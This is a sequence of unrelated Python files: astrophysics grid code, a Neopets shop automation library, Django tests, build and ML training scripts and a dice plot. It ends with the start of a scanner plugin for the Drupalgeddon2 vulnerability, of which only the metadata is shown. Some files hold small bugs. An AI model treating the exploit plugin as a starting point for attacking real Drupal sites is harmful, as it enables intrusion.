(self.logrmax-self.logrmin) + self.logrmin self.rs = 10**self.logrs self.r_borders = 10**self.logr_borders if circular: self.Es = array([profile_model.vcirc(r)**2/2 + profile_model.potentialr(r) for r in 10**self.logrs]) self.E_borders = array([profile_model.vcirc(r)**2/2 + profile_model.potentialr(r) for r in 10**self.logr_borders]) #import pdb; #pdb.set_trace() else: self.Es = profile_model.potentialr(10**self.logrs) self.E_borders = profile_model.potentialr(10**self.logr_borders) #print "Es", self.Es epsilon = 
0.0001 self.ls = (arange(0, n_I2, dtype=float)+0.5)/n_I2 * (1-2*epsilon) + epsilon self.l_borders = (arange(0, n_I2+1, dtype=float))/n_I2 * (1-2*epsilon) + epsilon self.dither = dither self.n_orbits = self.n_I1 * self.n_I2 self.n_cells = self.n_orbits self.order = order if not _issubgrid: #self.mesh = MeshRegularNodal2dLagrange1(self.logrmin, 0, self.logrmax, 1., self.n_I1, self.n_I2) cls = getattr(mab.gd.gdfast, "MeshRegularNodal2dLagrange" + str(self.order)) self.mesh = cls(self.logrmin, 0, self.logrmax, 1., self.n_I1, self.n_I2) self.dof = self.mesh.get_dof() self.dof_per_cell = self.mesh.get_dof_per_cell() else: self.mesh = None #self.xmin self.I1s = self.logrs self.I2s = self.ls if not _issubgrid: self.subgrid = Grid2I_Shaped_Inside(light_model, profile_model, logrmin, logrmax, n_I1*dither, n_I2*dither, dither=1, _issubgrid=True, circular=circular) else: self.subgrid = None def get_dof(self): return self.mesh.get_dof() def basis(self, i, u, v): return self.mesh.basis_uv(i, u, v) def dof_index(self, xi, yi, i): return self.mesh.dof_index(xi, yi, i) def solve_coordinates(self, inner_products): # system is not orthogonal, solve: M * coordinates = inner_products # where M_i,j = (inner product of basis vectors) coordinates = inner_products * 0 self.mesh.solve_coordinates(inner_products, coordinates) return coordinates def __call__(self, coordinates, logr, l): return self.mesh.eval(coordinates, logr, l) def index_to_orbitnr(self, i1, i2, i3): assert i3 == 0 return i1 + i2 *self.n_I1 # + i2 class Grid2d_Shaped_Inside(object): def __init__(self, xmin, xmax, ymin, ymax, nx, ny, dither=1, order=0, _issubgrid=False): self.xmin = xmin self.xmax = xmax self.ymin = ymin self.ymax = ymax self.nx = nx self.ny = ny self.resize = (self.xmin, self.ymin), (self.xmax, self.ymax) self.x = (arange(0, nx,dtype=float)+0.5) / (nx) * (self.xmax-self.xmin) + self.xmin self.x_borders = (arange(0, nx+1,dtype=float)) / (nx) * (self.xmax-self.xmin) + self.xmin self.y = (arange(0, ny, dtype=float)+0.5) / (ny) * (self.ymax-self.ymin) + self.ymin self.y_borders = (arange(0, ny+1, dtype=float)) / (nx) * (self.ymax-self.ymin) + self.ymin self.dither = dither self.n = self.nx * self.ny self.n_cells = self.n self.order = order if not _issubgrid: #self.mesh = MeshRegularNodal2dLagrange1(self.logrmin, 0, self.logrmax, 1., self.n_I1, self.n_I2) cls = getattr(mab.gd.gdfast, "MeshRegularNodal2dLagrange" + str(self.order)) self.mesh = cls(self.xmin, self.ymin, self.xmax, self.ymax, self.nx, self.ny) self.dof = self.mesh.get_dof() self.dof_per_cell = self.mesh.get_dof_per_cell() else: self.mesh = None if not _issubgrid: self.subgrid = Grid2d_Shaped_Inside(xmin, xmax, ymin, ymax, nx*dither, ny*dither, dither=1, _issubgrid=True) else: self.subgrid = None def get_dof(self): return self.mesh.get_dof() def basis(self, i, u, v): return self.mesh.basis_uv(i, u, v) def dof_index(self, xi, yi, i): return self.mesh.dof_index(xi, yi, i) def solve_coordinates(self, inner_products): # system is not orthogonal, solve: M * coordinates = inner_products # where M_i,j = (inner product of basis vectors) coordinates = inner_products * 0 self.mesh.solve_coordinates(inner_products, coordinates) return coordinates def __call__(self, coordinates, logr, l): return self.mesh.eval(coordinates, logr, l) #def index_to_orbitnr(self, i1, i2, i3): # assert i3 == 0 # return i1 + i2 *self.n_I1 # + i2 class Grid2I_Shaped_InsideTest(object): def __init__(self, light_model, profile_model, rmin, rmax, n_I1, n_I2, dither=1, order=0, _issubgrid=False): self.light_model 
= light_model self.profile_model = profile_model #self.logrmin = log10(light_model.arcsec_to_kpc(10**logrmin)) #self.logrmax = log10(light_model.arcsec_to_kpc(10**logrmax)) scale = 2 self.umin = arctan(rmin*scale) self.umax = arctan(rmax*scale) self.n_I1 = n_I1 self.n_I2 = n_I2 #self.logrs = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin #self.logr_borders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin us = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.umax-self.umin) + self.umin uborders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * (self.umax-self.umin) + self.umin self.rs = rs = tan(us)/scale self.r_borders = r_borders = tan(uborders)/scale self.Es = profile_model.potentialr(rs) self.E_borders = profile_model.potentialr(r_borders) epsilon = 0.0001 self.ls = (arange(0, n_I2, dtype=float)+0.5)/n_I2 * (1-2*epsilon) + epsilon self.l_borders = (arange(0, n_I2+1, dtype=float))/n_I2 * (1-2*epsilon) + epsilon self.dither = dither self.n_orbits = self.n_I1 * self.n_I2 self.n_cells = self.n_orbits self.order = order if not _issubgrid: #self.mesh = MeshRegularNodal2dLagrange1(self.logrmin, 0, self.logrmax, 1., self.n_I1, self.n_I2) cls = getattr(mab.gd.gdfast, "MeshRegularNodal2dLagrange" + str(self.order)) self.mesh = cls(self.umin, 0, self.umax, 1., self.n_I1, self.n_I2) self.dof = self.mesh.get_dof() self.dof_per_cell = self.mesh.get_dof_per_cell() else: self.mesh = None #self.xmin #self.I1s = self.logrs self.I2s = self.ls if not _issubgrid: self.subgrid = Grid2I_Shaped_InsideTest(light_model, profile_model, rmin, rmax, n_I1*dither, n_I2*dither, dither=1, _issubgrid=True) else: self.subgrid = None def basis(self, i, u, v): return self.mesh.basis_uv(i, u, v) def dof_index(self, xi, yi, i): return self.mesh.dof_index(xi, yi, i) def solve_coordinates(self, inner_products): # system is not orthogonal, solve: M * coordinates = inner_products # where M_i,j = (inner product of basis vectors) coordinates = inner_products * 0 self.mesh.solve_coordinates(inner_products, coordinates) return coordinates def __call__(self, coordinates, logr, l): return self.mesh.eval(coordinates, logr, l) def index_to_orbitnr(self, i1, i2, i3): assert i3 == 0 return i1 + i2 *self.n_I1 # + i2 class Grid3I_Block_Inside(object): def __init__(self, light_model, profile_model, logrmin, logrmax, n_I1, n_I2, n_I3, ditherI1=1, ditherI2=1, ditherI3=1, _issubgrid=False): self.light_model = light_model self.profile_model = profile_model self.logrmin = log10(light_model.arcsec_to_kpc(10**logrmin)) self.logrmax = log10(light_model.arcsec_to_kpc(10**logrmax)) self.n_I1 = n_I1 self.n_I2 = n_I2 self.n_I3 = n_I3 self.logrs = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.logr_borders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.Es = profile_model.potentialr(10**self.logrs) self.E_borders = profile_model.potentialr(10**self.logr_borders) epsilon = 0.0001 self.lzs = (arange(0, n_I2, dtype=float)+0.5)/n_I2 * (1-2*epsilon) + epsilon self.lz_borders = (arange(0, n_I2+1, dtype=float))/n_I2 * (1-2*epsilon) + epsilon self.i3s = (arange(0, n_I3, dtype=float)+0.5)/n_I3 * (1-2*epsilon) + epsilon self.i3_borders = (arange(0, n_32+1, dtype=float))/n_I3 * (1-2*epsilon) + epsilon self.ditherI1 = ditherI1 self.ditherI2 = ditherI2 self.ditherI3 = ditherI3 self.n_orbits = self.n_I1 * self.n_I2 * self.n_I3 self.dof_per_cell = 1 self.dof = self.n_orbits if not _issubgrid: 
self.subgrid = Grid3I_Block_Inside(light_model, profile_model, logrmin, logrmax, n_I1*ditherI1, n_I2*ditherI2, n_I3*ditherI3, ditherI1=1, ditherI2=1, ditherI3=1, _issubgrid=True) else: self.subgrid = None def basis(self, i, u, v, w): return 1 def index_to_dof(self, i1, i2, i3, i): return (i1*self.n_I2 + i2) * self.n_I3 + i3 def solve_coordinates(self, inner_products): # system is orthogonal, so inner products are the coordinates themselves return inner_products * 1.0 def index_to_orbitnr(self, i1, i2, i3): #assert i3 == 0 #$return i1*self.n_I2 + i2 return (i1*self.n_I2 + i2) * self.n_I3 + i3 def __call__(self, coordinates, logr, l): return self.mesh.eval(coorinates, logr, l) """:mod:`UserShop` -- Provides an interface for administrating a user shop .. module:: UserShop :synopsis: Provides an interface for administrating a user shop .. moduleauthor:: <> """ from neolib.exceptions import invalidUser from neolib.exceptions import parseException from neolib.inventory.UserShopBackInventory import UserShopBackInventory import logging class UserShop: """Provides an interface for administrating a user shop Provides functionality for loading a user's shop inventory, updating a shop inventory, loading basic shop details, and loading a shop's sales history. Attributes usr (User) -- User that owns the shop name (str) -- Shop name size (str) -- Shop size keeperName(str) -- Shop keeper's name keeperMessage(str) -- Shop keeper's message keeperImg(str) -- Shop keeper's image stock (str) -- Shop stock max (str) -- Max shop stock history (list) -- Shop sales history inventory (UserShopInventory) -- Shop inventory forms (dict) -- All HTML forms on each shop page Example >>> usr.shop.load() >>> usr.shop.inventory['Green Apple'].price = 1000 >>> usr.shop.update() True """ usr = None name = None size = None keeperName = None keeperMessage = None keeperImg = None stock = None max = None history = None inventory = None forms = None def __init__(self, usr): if not usr: raise invalidUser self.usr = usr @property def till(self): """ Queries the current shop till and returns the amount Returns str -- Amount of NPs in shop till Raises parseException """ pg = self.usr.getPage("http://www.neopets.com/market.phtml?type=till") try: return pg.find_all(text = "Shop Till")[1].parent.next_sibling.b.text.replace(" NP", "").replace(",", "") except Exception: logging.getLogger("neolib.shop").exception("Could not grab shop till.", {'pg': pg}) raise parseException def grabTill(self, nps): """ Withdraws given number of NPs from the shop till, returns result Parameters: nps (int) -- Number of NPs to withdraw Returns bool - True if successful, False otherwise """ if not int(nps): return False pg = self.usr.getPage("http://www.neopets.com/market.phtml?type=till") form = pg.form(action="process_market.phtml") form['amount'] = str(nps) form.usePin = True pg = form.submit() # If successful redirects to till page if "You currently have" in pg.content: return True else: logging.getLogger("neolib.shop").exception("Could not grab shop till.", {'pg': pg}) return False def load(self): """ Loads the shop details and current inventory Raises parseException """ pg = self.usr.getPage("http://www.neopets.com/market.phtml?type=your") try: self.name = pg.find_all(text = "Shop Till")[1].parent.parent.parent.previous_sibling.previous_sibling.text self.size = pg.find_all(text = "Shop Till")[1].parent.parent.parent.previous_sibling.split("(size ")[1].replace(")", "") panel = pg.find("img", {"name": "keeperimage"}).parent self.keeperName = 
panel.b.text.split(" says ")[0] self.keeperMessage = panel.b.text.split(" says ")[1] self.keeperImg = panel.img['src'] self.stock = panel.find_all("b")[1].text self.max = panel.find_all("b")[2].text except Exception: logging.getLogger("neolib.shop").exception("Could not parse shop details.", {'pg': pg}) raise parseException self.inventory = UserShopBackInventory(self.usr, pg) self.forms = self.inventory.forms def loadHistory(self): """ Loads the shop sale history Raises parseException """ pg = self.usr.getPage("http://www.neopets.com/market.phtml?type=sales")\ try: rows = pg.find("b", text = "Date").parent.parent.parent.find_all("tr") # First and last row do not contain entries rows.pop(0) rows.pop(-1) self.history = [] for row in rows: parts = row.find_all("td") dets = {} dets['date'] = parts[0].text dets['item'] = parts[1].text dets['buyer'] = parts[2].text dets['price'] = parts[3].text self.history.append(dets) # Reverse the list to put it in order by date self.history.reverse() except Exception: logging.getLogger("neolib.shop").exception("Could not parse sales history.", {'pg': pg}) raise parseException def update(self): """ Updates the shop inventory, returns result Loops through all pages in the inventory and checks for any changed item on a page. A changed item is identified as the price being different from the original price, or the remove property of the item being set to anything other than 0. Any pages with changed items are updated accordingly. Returns bool - True if successful, false otherwise Raises parseException """ for x in range(1, self.inventory.pages + 1): if self._hasPageChanged(x): form = self._updateForm(x) pg = form.submit() # If successful redirects to shop if "The Marketplace" in pg.content: return True else: logging.getLogger("neolib.shop").exception("Could not verify if prices were updated on user shop.", {'pg': pg}) return False def _itemsOnPage(self, pg): ret = [] for item in self.inventory: if isinstance(item, list): for subItem in item: if subItem.pg == pg: ret.append(subItem) continue if item.pg == pg: ret.append(item) return ret def _hasPageChanged(self, pg): for item in self._itemsOnPage(pg): if item.price != item.oldPrice: return True if item.remove > 0: return True return False def _updateForm(self, pg): if 'remove_all' in self.forms[pg]: del self.forms[pg]['remove_all'] for item in self._itemsOnPage(pg): self.forms[pg]['cost_' + str(item.pos)] = str(item.price) self.forms[pg]['back_to_inv[' + item.id + ']'] = int(item.remove) return self.forms[pg] luismorenolopera/django-rest-framework-json-api import pytest from example.factories import BlogFactory from example.models import Blog pytestmark = pytest.mark.django_db def test_factory_instance(blog_factory): assert blog_factory == BlogFactory def test_model_instance(blog): assert isinstance(blog, Blog) def test_multiple_blog(blog_factory): another_blog = blog_factory(name='Cool Blog') new_blog = blog_factory(name='Awesome Blog') assert another_blog.name == 'Cool Blog' assert new_blog.name == 'Awesome Blog' def test_factories_with_relations(author_factory, entry_factory): author = author_factory(name="") entry = entry_factory( headline=("The Absolute Minimum Every Software Developer" "Absolutely, Positively Must Know About Unicode " "and Character Sets (No Excuses!)"), blog__name='Joel on Software', authors=(author, )) assert entry.blog.name == 'Joel on Software' assert entry.headline == ("The Absolute Minimum Every Software Developer" "Absolutely, Positively Must Know About Unicode " "and Character Sets 
(No Excuses!)") assert entry.authors.all().count() == 1 assert entry.authors.all()[0].name == '' from paver.easy import sh, task import os @task def build(): if os.path.exists('./build'): sh('rm -rf ./build') script = ''' mkdir ./build cp -rf ./src/* ./build/ (cd ./build; python setup.py sdist bdist_wheel) ''' sh(script) @task def deploy(): script = ''' twine upload ./build/dist/* ''' sh(script) #!/usr/bin/env python3.6 # # run_nemo_model.py # # <> # # Copyright (C) 2019-2021 ETH Zurich, University of Bologna # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # See LICENSE.sw.txt for details. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ @file: run_nemo_model.py @brief Trains a quantized example network with NEMO and exports to RBE @author: () """ import numpy as np import argparse from rbe import RBE from helper_functions import compare_models_numpy import torch import torch.nn as nn import torch.nn.functional as F from torchvision import datasets, transforms import nemo from tqdm import tqdm from matplotlib import pyplot as plt np.set_printoptions(threshold=np.inf) display_active = True # MAIN FUNCTION if __name__ == '__main__': parser = argparse.ArgumentParser(description="Run RBE golden model") ### ### Quantization parameters ### # quantizations of 1bit up to 8-bits possible parser.add_argument("--qw", dest="qw", type=int, default=8, choices=(1, 2, 3, 4, 5, 6, 7, 8), help="HW parameter - activation quantization level (quantizations of 1bit up to 8-bits possible)") # quantizations of 1bit up to 8-bits possible in power-of-two steps parser.add_argument("--qa", dest="qa", type=int, default=8, choices=(1, 2, 3, 4, 5, 6, 7,8), help="HW parameter - activation quantization level (quantizations of 1bit up to 8-bits possible in power-of-two steps)") # quantizations of 1bit up to 8-bits possible in power-of-two steps parser.add_argument("--qao", dest="qao", type=int, default=8, choices=(1, 2, 3, 4, 5, 6, 7, 8), help="HW parameter - activation quantization level (quantizations of 1bit up to 8-bits possible in power-of-two steps)") # quantizations of 1bit up to 8-bits possible in power-of-two steps parser.add_argument("--vverify", dest="verify", type=int, default=1, choices=(0,1), help="Verification - SW golden model is verified with simple golden model") # get arguments args = parser.parse_args() # Define the Network class ExampleNet(nn.Module): def __init__(self): super(ExampleNet, self).__init__() self.conv1 = nn.Conv2d(1, 32, 3, 1) self.bn1 = nn.BatchNorm2d(32) self.relu1 = nn.ReLU() # <== Module, not Function! self.conv2 = nn.Conv2d(32, 64, 3, 2) self.bn2 = nn.BatchNorm2d(64) self.relu2 = nn.ReLU() # <== Module, not Function! self.fc1 = nn.Linear(9216, 256) self.fcrelu1 = nn.ReLU() # <== Module, not Function! self.fc2 = nn.Linear(256, 10) def forward(self, x): x = self.conv1(x) x = self.bn1(x) x = self.relu1(x) # <== Module, not Function! x = self.conv2(x) x = self.bn2(x) x = self.relu2(x) # <== Module, not Function! x = torch.flatten(x, 1) x = self.fc1(x) x = self.fcrelu1(x) # <== Module, not Function! 
x = self.fc2(x) output = F.log_softmax(x, dim=1) # <== the softmax operation does not need to be quantized, we can keep it as it is return output # Define Metric class Metric(object): def __init__(self, name): self.name = name self.sum = torch.tensor(0.) self.n = torch.tensor(0.) def update(self, val): self.sum += val.cpu() self.n += 1 @property def avg(self): return self.sum / self.n # Define Training Method def train(model, device, train_loader, optimizer, epoch, verbose=True): model.train() train_loss = Metric('train_loss') with tqdm(total=len(train_loader), desc='Train Epoch #{}'.format(epoch + 1), disable=not verbose) as t: for batch_idx, (data, target) in enumerate(train_loader): data, target = data.to(device), target.to(device) optimizer.zero_grad() output = model(data) loss = F.nll_loss(output, target) loss.backward() optimizer.step() train_loss.update(loss) t.set_postfix({'loss': train_loss.avg.item()}) t.update(1) return train_loss.avg.item() # Define Test Method def test(model, device, test_loader, integer=False, verbose=True): model.eval() test_loss = 0 correct = 0 test_acc = Metric('test_acc') with tqdm(total=len(test_loader), desc='Test', disable=not verbose) as t: with torch.no_grad(): for data, target in test_loader: if integer: # <== this will be useful when we get to the data *= 255 # IntegerDeployable stage data, target = data.to(device), target.to(device) output = model(data) test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability correct += pred.eq(target.view_as(pred)).sum().item() test_acc.update((pred == target.view_as(pred)).float().mean()) t.set_postfix({'acc' : test_acc.avg.item() * 100. }) t.update(1) test_loss /= len(test_loader.dataset) return test_acc.avg.item() * 100. 
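# (illustrative aside, not part of the original flow) The --qw/--qa/--qao options parsed
# above select uniform quantization bit-widths. Independently of NEMO's own implementation,
# the core fake-quantization step they control can be sketched as clamping to a range
# [0, alpha] and rounding onto 2**bits - 1 uniform steps (simplified stand-in with
# hypothetical names):
def _fake_quantize_unsigned(x, bits, alpha=1.0):
    """Map x onto 2**bits uniformly spaced levels spanning [0, alpha]."""
    levels = 2 ** bits - 1
    x = torch.clamp(x, 0.0, alpha)
    return torch.round(x * levels / alpha) * (alpha / levels)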
# Configure GPU device = torch.device("cuda" if torch.cuda.is_available() else "cpu") kwargs = {'num_workers': 1, 'pin_memory': True} if torch.cuda.is_available() else {} # Load MNIST data loader train_loader = torch.utils.data.DataLoader( datasets.MNIST('../data', train=True, download=True, transform=transforms.Compose([ transforms.ToTensor() ])), batch_size=128, shuffle=True, **kwargs ) test_loader = torch.utils.data.DataLoader( datasets.MNIST('../data', train=False, transform=transforms.Compose([ transforms.ToTensor() ])), batch_size=128, shuffle=False, **kwargs ) # Download the trained full-precision model model = ExampleNet().to(device) try: state_dict = torch.load("mnist_cnn_fp.pt", map_location='cpu') except FileNotFoundError: import os os.system("wget https://raw.githubusercontent.com/FrancescoConti/nemo_examples_helper/master/mnist_cnn_fp.pt") state_dict = torch.load("mnist_cnn_fp.pt", map_location='cpu') model.load_state_dict(state_dict, strict=True) acc = test(model, device, test_loader) print("\nFullPrecision accuracy: %.02f%%" % acc) # example mixed precision model = nemo.transform.quantize_pact(model, dummy_input=torch.randn((1,1,28,28)).to(device)) # TODO note asymetric training, therewore weight bits reduced by 1 precision = { 'conv1': { 'W_bits' : args.qw-1, 'x_bits' : args.qa }, 'conv2': { 'W_bits' : args.qw-1 }, 'fc1': { 'W_bits' : args.qw-1 }, 'fc2': { 'W_bits' : args.qw-1 }, 'relu1': { 'x_bits' : args.qao }, 'relu2': { 'x_bits' : args.qao }, 'fcrelu1': { 'x_bits' : args.qao }, } model.change_precision(bits=1, min_prec_dict=precision) acc = test(model, device, test_loader) # Deployable setup model = nemo.transform.bn_quantizer(model) model.harden_weights() model.set_deployment(eps_in=1./255) acc = test(model, device, test_loader) print("\nQuantizedDeployable @ mixed-precision accuracy: %.02f%%" % acc) # Integerize Model model = nemo.transform.integerize_pact(model, eps_in=1.0/255) acc = test(model, device, test_loader, integer=True) print("\nIntegerDeployable @ mixed-precision accuracy: %.02f%%" % acc) ##### export to RBE # Generate sample input data from MNIST dataset correct = 0 total = 0 sample = 2 # id within the dataset sample_image = test_loader.dataset.data[sample, :, :] sample_image = np.reshape(sample_image, (1,1,28,28)).float() sample_expclass = test_loader.dataset.targets[sample] if display_active: plt.imshow(sample_image[0,0,:,:]) plt.show() # Take small part of image for fast illustration sample_image_small = sample_image[0:1, 0:1, 0:5, 0:5] # Init RBE with nemo and create stimuli rbe = RBE.init_from_nemo(list(layers)[0][1], list(layers)[1][1], list(layers)[2][1], sample_image_small) rbe.print_overview() # run golden model and bittrue model rbe.run_bittrue_shifted_network(verify_model=True) # compare golden model with actual nemo output compare_models_numpy(rbe.y_golden, rbe.y_nemo, display_active) import argparse import os import shutil import time import glob import numpy as np import torch import torch.nn.parallel import torch.utils.data import torch.utils.data.distributed from src.datasets.image_loaders import get_image_loader from src.utils import mkdir, save_object, cprint, load_object from src.probability import depth_categorical_VI from src.DUN.training_wrappers import DUN_VI from src.DUN.stochastic_img_resnets import resnet18, resnet34, resnet50, resnet101 parser = argparse.ArgumentParser(description='PyTorch ImageNet Training') parser.add_argument('--dataset', type=str, default='MNIST', choices=["CIFAR10", "CIFAR100", "SVHN", "MNIST", "Fashion"], 
help='dataset to train (default: MNIST)') parser.add_argument('--data_dir', type=str, default='../data/', help='directory where datasets are saved (default: ../data/)') parser.add_argument('-j', '--workers', default=4, type=int, help='number of data loading workers (default: 4)') parser.add_argument('--epochs', default=None, type=int, help='number of total epochs to run (if None, use dataset default)') parser.add_argument('-wd', '--weight_decay', default=1e-4, type=float, help='weight decay (default: 1e-4)') parser.add_argument('--savedir', default='./results/', type=str, help='path where to save checkpoints (default: ./results/)') parser.add_argument('--resume', default='', type=str, help='path to latest checkpoint (default: none)') parser.add_argument('--gpu', default=0, type=int, help='GPU id to use. (default: 0)') parser.add_argument('--batch_size', default=256, type=int, help='Batch size to use. (default: 256)') parser.add_argument('--model', type=str, default='resnet50', choices=["resnet18", "resnet32", "resnet50", "resnet101"], help='model to train (default: resnet50)') parser.add_argument('--start_depth', default=1, type=int, help='first layer to be uncertain about (default: 1)') parser.add_argument('--end_depth', default=13, type=int, help='last layer to be uncertain about + 1 (default: 13)') parser.add_argument('--q_nograd_its', default=0, type=int, help='number of warmup epochs (where q is not learnt) (default: 0)') best_err1 = 1 lr = 0.1 momentum = 0.9 def main(args): dataset = args.dataset workers = args.workers epochs = args.epochs weight_decay = args.weight_decay resume = args.resume savedir = args.savedir gpu = args.gpu q_nograd_its = args.q_nograd_its batch_size = args.batch_size data_dir = args.data_dir start_depth = args.start_depth end_depth = args.end_depth model = args.model os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu) savedir += "/" + "_".join([dataset, model, "DUN", f"warm{q_nograd_its}", f"{start_depth}-{end_depth}"]) savedir += "_wd" if weight_decay != 0 else "_nowd" num = len(glob.glob(savedir + "*")) savedir += f"_{num}" epoch_dict = { 'Imagenet': 90, 'SmallImagenet': 90, 'CIFAR10': 300, 'CIFAR100': 300, 'SVHN': 90, 'Fashion': 90, 'MNIST': 90 } milestone_dict = { 'Imagenet': [30, 60], # This is pytorch default 'SmallImagenet': [30, 60], 'CIFAR10': [150, 225], 'CIFAR100': [150, 225], 'SVHN': [50, 70], 'Fashion': [40, 70], 'MNIST': [40, 70] } if epochs is None: epochs = epoch_dict[dataset] milestones = milestone_dict[dataset] initial_conv = '3x3' if dataset in ['Imagenet', 'SmallImagenet'] else '1x3' input_chanels = 1 if dataset in ['MNIST', 'Fashion'] else 3 if dataset in ['Imagenet', 'SmallImagenet']: num_classes = 1000 elif dataset in ['CIFAR100']: num_classes = 100 else: num_classes = 10 if model == 'resnet18': model_class = resnet18 elif model == 'resnet18': model_class = resnet34 elif model == 'resnet50': model_class = resnet50 elif model == 'resnet101': model_class = resnet101 else: raise Exception('requested model not implemented') cuda = torch.cuda.is_available() print('cuda', cuda) assert cuda n_layers = end_depth - start_depth prior_probs = [1 / (n_layers)] * (n_layers) prob_model = depth_categorical_VI(prior_probs, cuda=cuda) model = model_class(arch_uncert=True, start_depth=start_depth, end_depth=end_depth, num_classes=num_classes, zero_init_residual=True, initial_conv=initial_conv, concat_pool=False, input_chanels=input_chanels, p_drop=0) N_train = 0 net = DUN_VI(model, prob_model, N_train, lr=lr, momentum=momentum, weight_decay=weight_decay, 
cuda=cuda, schedule=milestones, regression=False, pred_sig=None) train_loop(net, dname=dataset, data_dir=data_dir, epochs=epochs, workers=workers, resume=resume, savedir=savedir, q_nograd_its=q_nograd_its, batch_size=batch_size) def train_loop(net, dname, data_dir, epochs=90, workers=4, resume='', savedir='./', save_all_epochs=False, q_nograd_its=0, batch_size=256): mkdir(savedir) global best_err1 # Load data here: _, train_loader, val_loader, _, _, Ntrain = \ get_image_loader(dname, batch_size, cuda=True, workers=workers, distributed=False, data_dir=data_dir) net.N_train = Ntrain start_epoch = 0 marginal_loglike = np.zeros(epochs) train_loss = np.zeros(epochs) dev_loss = np.zeros(epochs) err_train = np.zeros(epochs) err_dev = np.zeros(epochs) # optionally resume from a checkpoint if resume: if os.path.isfile(resume): print("=> loading checkpoint '{}'".format(resume)) start_epoch, best_err1 = net.load(resume) print("=> loaded checkpoint '{}' (epoch {})" .format(resume, start_epoch)) else: print("=> no checkpoint found at '{}'".format(resume)) candidate_progress_file = resume.split('/') candidate_progress_file = '/'.join(candidate_progress_file[:-1]) + '/stats_array.pkl' if os.path.isfile(candidate_progress_file): print("=> found progress file at '{}'".format(candidate_progress_file)) try: marginal_loglike, err_train, train_loss, err_dev, dev_loss = \ load_object(candidate_progress_file) print("=> Loaded progress file at '{}'".format(candidate_progress_file)) except Exception: print("=> Unable to load progress file at '{}'".format(candidate_progress_file)) else: print("=> NOT found progress file at '{}'".format(candidate_progress_file)) if q_nograd_its > 0: net.prob_model.q_logits.requires_grad = False for epoch in range(start_epoch, epochs): if q_nograd_its > 0 and epoch == q_nograd_its: net.prob_model.q_logits.requires_grad = True tic = time.time() nb_samples = 0 for x, y in train_loader: marg_loglike_estimate, minus_loglike, err = net.fit(x, y) marginal_loglike[epoch] += marg_loglike_estimate * x.shape[0] err_train[epoch] += err * x.shape[0] train_loss[epoch] += minus_loglike * x.shape[0] nb_samples += len(x) marginal_loglike[epoch] /= nb_samples train_loss[epoch] /= nb_samples err_train[epoch] /= nb_samples toc = time.time() # ---- print print('\n depth approx posterior', net.prob_model.current_posterior.data.cpu().numpy()) print("it %d/%d, ELBO/evidence %.4f, pred minus loglike = %f, err = %f" % (epoch, epochs, marginal_loglike[epoch], train_loss[epoch], err_train[epoch]), end="") cprint('r', ' time: %f seconds\n' % (toc - tic)) net.update_lr() # ---- dev tic = time.time() nb_samples = 0 for x, y in val_loader: minus_loglike, err = net.eval(x, y) dev_loss[epoch] += minus_loglike * x.shape[0] err_dev[epoch] += err * x.shape[0] nb_samples += len(x) dev_loss[epoch] /= nb_samples err_dev[epoch] /= nb_samples toc = time.time() cprint('g', ' pred minus loglike = %f, err = %f\n' % (dev_loss[epoch], err_dev[epoch]), end="") cprint('g', ' time: %f seconds\n' % (toc - tic)) filename = 'checkpoint.pth.tar' if save_all_epochs: filename = str(epoch) + '_' + filename net.save(os.path.join(savedir, filename), best_err1) if err_dev[epoch] < best_err1: best_err1 = err_dev[epoch] cprint('b', 'best top1 dev err: %f' % err_dev[epoch]) shutil.copyfile(os.path.join(savedir, filename), os.path.join(savedir, 'model_best.pth.tar')) all_results = [marginal_loglike, err_train, train_loss, err_dev, dev_loss] save_object(all_results, os.path.join(savedir, 'stats_array.pkl')) if __name__ == '__main__': args = 
parser.parse_args() main(args) charliealpha094/Project_Data_Visualization0 #Done by (21/07/2020) #Try 15.7 - Three Dice """ When you roll three D6 dice, the smallest number you can roll is 3 and the largest number is 18. Create a visualization that shows what hap- pens when you roll three D6 dice. """ from plotly.graph_objs import Bar, Layout from plotly import offline from dice import Die #Create three D6 dices. die_1 = Die() die_2 = Die() die_3 = Die() #Make some rolls, and store the results in a list. results = [] for roll_num in range(500): result = die_1.roll() + die_2.roll() + die_3.roll() results.append(result) #Analyse the results frequencies = [] max_result = die_1.num_sides + die_2.num_sides + die_3.num_sides for value in range (3, max_result+1): frequency = results.count(value) frequencies.append(frequency) #Visualize the results x_values = list(range(3, max_result+1)) data = [Bar(x=x_values, y=frequencies)] x_axis_config = {'title': 'Result', 'dtick': 1} y_axis_config = {'title': 'Frequency of Result'} my_layout = Layout(title='Results of rolling three D6 dice 1000 times.', xaxis=x_axis_config, yaxis=y_axis_config) offline.plot({'data': data, 'layout': my_layout}, filename='D6_D6_D6.html')mehrdad-shokri/ZEROScan10-100 #!/usr/bin/env python # -*- coding:utf-8 -*- from thirdparty import requests from bs4 import BeautifulSoup import random import string import sys import base64 import urllib def expInfo(): expInfo={} expInfo["appName"] = "Drupal" expInfo["appVersion"] = "Drupal < 7.58" expInfo["author"] = "Z3r0yu" expInfo["description"] = "PoC for testing Drupalgeddon2 (CVE-2018-7600) vulnerability. Works for Drupal 7 and Drupal 8." expInfo["references"] = "https://github.com/0ang3el/drupalgeddon2" expInfo["options"] = [ { "Name": "URL", "Current Setting": "", "Required": True, "Description": "URL or URL file" }, { "Name": "Thread", "Current Setting": "1", "Required": False, "Description": "Threads" }, { "Name": "Cookie", "Current Setting": "", "Required": False, "Description": "cookie" }, { "Name": "Report", "Current Setting": "", "Required": False, "Description": "do you need a html report?" 
